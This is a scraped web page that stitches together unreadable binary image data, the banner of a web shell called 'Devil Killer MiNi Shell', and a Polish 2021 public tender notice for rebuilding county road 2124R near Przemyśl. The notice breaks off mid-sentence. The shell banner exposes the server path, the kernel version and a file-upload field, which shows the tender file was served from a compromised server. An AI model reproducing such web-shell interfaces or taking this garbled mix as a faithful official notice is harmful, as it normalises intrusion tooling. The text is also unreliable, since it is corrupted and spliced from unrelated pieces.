JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210930/0019725301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi powiatowej nr 2124R Żurawica-Bolestraszyce </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Przemyślu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650945384</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Dominikański, 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przemyśl</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdpprzemysl@op.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdpp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi powiatowej nr 2124R Żurawica-Bolestraszyce </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-236132bf-21c1-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00197253</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000533/15/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.28 Przebudowa drogi powiatowej nr 2124R Żurawica-Bolestraszyce</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zp.powiat.przemysl.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zp.powiat.przemysl.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj.<br/>bezpłatnierejestrując się lub logując, w przypadku posiadania konta w Platformie Zamówień<br/>Publicznych,akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na<br/>stronieinternetowej https://zp.powiat.przemysl.pl/oraz uznaje go za wiążący.3. Ogólne zasady<br/>korzystania zPlatformy:1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu<br/>nasubdomenie https://zp.powiat.przemysl.pl/2) Wykonawca aby przystąpić do postępowania<br/>musizałożyć konto na Platformie https://zp.powiat.przemysl.pl/ gdzie zostanie powiadomiony o<br/>możliwościzalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesurejestracyjnego; podaje adres e-mail, otrzymuje link aktywacyjny, a następnie ustanawia<br/>hasło.3)Proces rejestracji Wykonawcy jest w pełni automatyczny, po zarejestrowaniu należy podać<br/>dane firmy,którą osoba zakładająca konto reprezentuje.4) Po założeniu konta Wykonawca ma<br/>możliwość złożeniaOferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w<br/>szczególnościzawiadomienia oraz informacje, przekazywane są w formie elektronicznej za<br/>pośrednictwem Platformyi powiadomień mailowych.5) Zamawiający, zgodnie z § 3<br/>ROZPORZĄDZENIE PREZESA RADYMINISTRÓWz dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacjioraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznejw postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (dalej jako "Rozporządzenie")określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na Platformie Zakupowej,tj.: a) stały dostęp do sieci Internet o gwarantowanej<br/>przepustowości nie mniejszej niż 512 kb/s,b)komputer klasy PC lub MAC, o następującej konfiguracji:<br/>pamięć min 2GB Ram, procesor Intel IV2GHZ, jeden z systemów operacyjnych - MS Windows 10, Mac<br/>Os x 10.4, Linux, lub ich nowszewersje,c) zainstalowana dowolna przeglądarka internetowa najlepiej<br/>najnowszej dostępnej wersjiobsługująca TLS 1.2 z wyjątkiem Internet Explorer,d) włączona obsługa<br/>JavaScript,e) zainstalowanyprogram Acrobat Reader lub inny obsługujący pliki w formacie .pdf,f)<br/>podłączony lub wbudowany dokomputera czytnik karty kryptograficznej wydanej przez wystawcę<br/>certyfikatu używanego przezWykonawcę.6) Zamawiający, zgodnie z § 3 powołanego powyżej<br/>Rozporządzenia określa:a)dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100<br/>MB w formatach: .doc, .pdf,.zip.b) informacje na temat kodowania i czasu odbioru danych: - plik<br/>załączony przez Wykonawcę naPlatformie Zamówień Publicznych i zapisany, widoczny jest w<br/>Systemie, jako zaszyfrowany – formatkodowania UTF8. Możliwość otworzenia pliku dostępna jest<br/>dopiero po odszyfrowaniu przezZamawiającego po upływie terminu składania ofert.c) oznaczenie<br/>czasu odbioru danych przezPlatformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg<br/>czasu platformy, który jest synchronizowany ze znacznikiem czasu UTC.4. Wykonawca powinien dokładnie zapoznać się zniniejszą SWZ i złożyć ofertę zgodnie z określonymi wymaganiami.5.<br/>Wszelkie oświadczenia, wnioski,zawiadomienia oraz informacje przekazywane będą elektronicznie za<br/>pośrednictwem dedykowanegoformularza udostępnionego na Platformie: zp.powiat.przemysl.pl6.<br/>Dokumenty, podmiotowe środkidowodowe oraz inne dokumenty lub oświadczenia muszą być złożone<br/>w formie elektronicznej lub wpostaci elektronicznej opatrzone podpisem zaufanym lub podpisem<br/>osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji<br/>określoną w dokumencie rejestrowymwłaściwym dla formy organizacyjnej lub innym dokumencie oraz<br/>składane są przez Wykonawcę zapośrednictwem Formularza do komunikacji jako załączniki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:2. administratorem Pani/Pana danych<br/>osobowych jestDyrektor Zarządu Dróg Powiatowych w Przemyślu Plac Dominikański 3 , 37-700<br/>Przemyśl3.administrator wyznaczył Inspektora Danych Osobowych : P. mgr Elżbieta Kalita z którym<br/>można siękontaktować pod adresem e-mail: zdpprzemysl@op.pl, .tel. 16 675-00-254. Dane osobowe<br/>wykonawcybędą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>przedmiotowympostępowaniem o udzielenie zamówienia publicznego. 5. Odbiorcami przekazanych<br/>przez wykonawcędanych osobowych będą osoby lub podmioty, którym zostanie udostępniona<br/>dokumentacjapostępowania zgodnie z art.74 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o<br/>dostępie doinformacji publicznej.6. Dane osobowe wykonawcy zawarte w protokole postępowania<br/>będąprzechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeliczas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy.7.Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jestwymogiem ustawowym określonym w przepisanych ustawy P.Z.P., związanym z<br/>udziałem wpostępowaniu o udzielenie zamówienia publicznego.8. W odniesieniu do Pani/Pana danych<br/>osobowychdecyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.9.<br/>PosiadaPani/Pan:a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących(w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora<br/>niewspółmierniedużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych<br/>informacji mającychna celu sprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>postępowania o udzieleniezamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty<br/>zakończonegopostępowania o udzielenie zamówienia);b) na podstawie art. 16 RODO prawo do<br/>sprostowaniaPani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianąwyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy wzakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz<br/>jegozałączników);c) na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczeniaprzetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzieleniezamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawodo ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania,<br/>w celuzapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznejlub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwaczłonkowskiego);d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdyuzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;10. Nie przysługuje Pani/Panu:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo<br/>do usunięciadanych osobowych;b) prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO;c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>11.Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z<br/>RODOprzetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym<br/>dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP.IV.333-26/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi powiatowej nr 2124R Żurawica-Buszkowice </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi <br/>kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał <br/>spełnienie kryteriów:<br/>Lp. Opis kryterium oceny Znaczenie (%)<br/>1. Cena (koszt) 60%<br/>2. Termin gwarancji i rękojmi 40%<br/>Razem 100%<br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-<br/>punktowej. <br/>CENA – 60%<br/>Cena będzie oceniana metodą punktową wg wzoru: <br/>Cena najniższa ze wszystkich ofert x 100pkt x Znaczenie kryterium 60%<br/>Cena oferty badanej<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>TERMIN GWARANCJI I RĘKOJMI – 40%<br/>Oferta w kryterium termin gwarancji i rękojmi może uzyskać od 0 do 40 pkt, przy czym <br/>oferta z najdłuższym okresem gwarancji otrzyma max 40 pkt. Pozostałym wykonawcom <br/>zostaną przyznane punkty wg następującego wzoru:<br/>Wartość punktowa = Rk Tn / Tmax<br/>Rk - waga kryterium<br/>Tn - termin gwarancji oferowany w aktualnie ocenianej ofercie<br/>Tmax -największa liczba punktów osiągnięta przez którąkolwiek z ofert w ramach <br/>kryterium nr 2<br/>Zamawiający przyzna punkty za termin gwarancji nie krótszy niż 36 miesięcy i nie dłuższy <br/>niż 48 miesięcy. W przypadku zaoferowania terminu krótszego niż 36 miesięcy<br/>Zamawiający przyzna 0 punktów bez poddawania porównywaniu z innymi ofertami. <br/>W przypadku zaoferowania terminu dłuższego niż 48 miesięcy Zamawiający <br/>do porównania przyjmie termin 48 miesięcy, natomiast Wykonawca będzie związany <br/>terminem zaoferowanym w ofercie.<br/>Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium <br/>termin gwarancji i rękojmi <br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + liczba <br/>punktów za termin gwarancji i rękojmi (maks. 40) <br/>1. Opis sposobu obliczenia łącznej oceny ofert:<br/>1) Łączna ocena punktowa (P) oferty zostanie obliczona według formuły<br/>P = PC + TGR <br/>Gdzie:<br/>PC – ilość punktów przyznanych Wykonawcy w kryterium cena brutto zamówienia,<br/>TGR – ilość punktów przyznanych Wykonawcy w kryterium termin gwarancji i rękojmi.<br/>Łączna ilość punktów oferty stanowi sumę ilości punktów przyznanych w kryterium „CENA” oraz <br/>ilości punktów przyznanych w kryterium „TERMIN GWARANCJI I RĘKOJMI”. Oferta, która <br/>otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe <br/>oferty zostaną sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.<br/>2. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert <br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród <br/>tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>3. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera <br/>ofertę z najniższą ceną.<br/>2. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 2, zamawiający wzywa <br/>wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego <br/>ofert dodatkowych zawierających nową cenę.<br/>5. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z <br/>dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących <br/>treści złożonej oferty lub innych składanych dokumentów lub oświadczeń w tym zaoferowanej <br/>ceny.<br/>7.Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu<br/>nazasadach określonych w pkt. 8 II Rozdziału oraz spełniają na podstawie art. 112 określone<br/>przezZamawiającego warunki udziału w postępowaniu dotyczące:1) zdolności do występowania<br/>wobrocie gospodarczym:Zamawiający nie precyzuje w tym zakresie żadnych wymagań,<br/>którychspełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.2) uprawnień<br/>doprowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z<br/>odrębnychprzepisów:Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których<br/>spełnienieWykonawca zobowiązany jest wykazać w sposób szczególny.3) sytuacji ekonomicznej<br/>lubfinansowej:Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których<br/>spełnienieWykonawca zobowiązany jest wykazać w sposób szczególny.4) zdolności technicznej<br/>lubzawodowej:Zamawiający uzna, że wykonawca spełnia warunek w zakresie<br/>kwalifikacjizawodowych, jeżeli: Wykonawca wykaże:- że będzie dysponował w trakcie<br/>realizacjizamówienia min. 1 osobą - kierownikiem branży drogowej (posiadającym uprawnienia<br/>dokierowania robotami w specjalności drogowej) lub równoważne uprawnienia, wydane<br/>napodstawie wcześniej obowiązujących przepisów, które pozwalać będą na pełnienie<br/>funkcjiKierownika budowy w zakresie niniejszego zamówieniaUWAGA:Zamawiający,<br/>określającwymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych,<br/>dopuszczaodpowiadające im uprawnienia budowlane nadane obywatelom państw<br/>członkowskich wrozumieniu art 4a ustawy z dnia 15 grudnia 2000 r. o samorządach<br/>zawodowych architektóworaz inżynierów budownictwa (Dz. U z 2016 r., poz. 1725 t.j.). uznane<br/>na podstawie odrębnychprzepisów, stosowanie do treści art. 12 a ustawy Prawo Budowlane<br/>.Ilekroć w opisie warunkówudziału w postępowaniu mowa jest o uprawnieniach, to w przypadku<br/>osób będącychobywatelami państw członkowskich oznacza to decyzję w sprawie uznania<br/>wymaganychkwalifikacji do wykonywania w Rzeczpospolitej Polskiej samodzielnych funkcji<br/>technicznych wbudownictwie w zakresie przedmiotu niniejszego zamówienia – zgodnie z<br/>właściwymiprzepisami, w szczególności z Ustawą o zasadach uznawania kwalifikacji<br/>zawodowych nabytychw państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65 z<br/>późn. zm.) orazUstawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz<br/>inżynierówbudownictwa (Dz. U z 2016 r., poz. 1725 t.j.).Wszystkie w/w osoby kadry technicznej<br/>musząposługiwać się językiem polskim lub w przypadku braku znajomości języka polskiego<br/>przez w/wosoby, Wykonawca zobowiązany jest na własny koszt do zapewnienia tłumacza<br/>językapolskiego w celu stałego bieżącego i symultanicznego tłumaczenia w kontaktach<br/>pomiędzyZamawiającym a personelem Wykonawcy. Podmiot, który zobowiązał się do<br/>udostępnieniazasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji<br/>finansowej lubekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek<br/>nieudostępnieniatych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi<br/>winy. Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni<br/>polegać nazdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do<br/>realizacjiktórych te zdolności są wymagane. W przypadku posługiwania się przez wykonawcę<br/>cudzympotencjałem, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby,jeśli podmioty te wykonają roboty 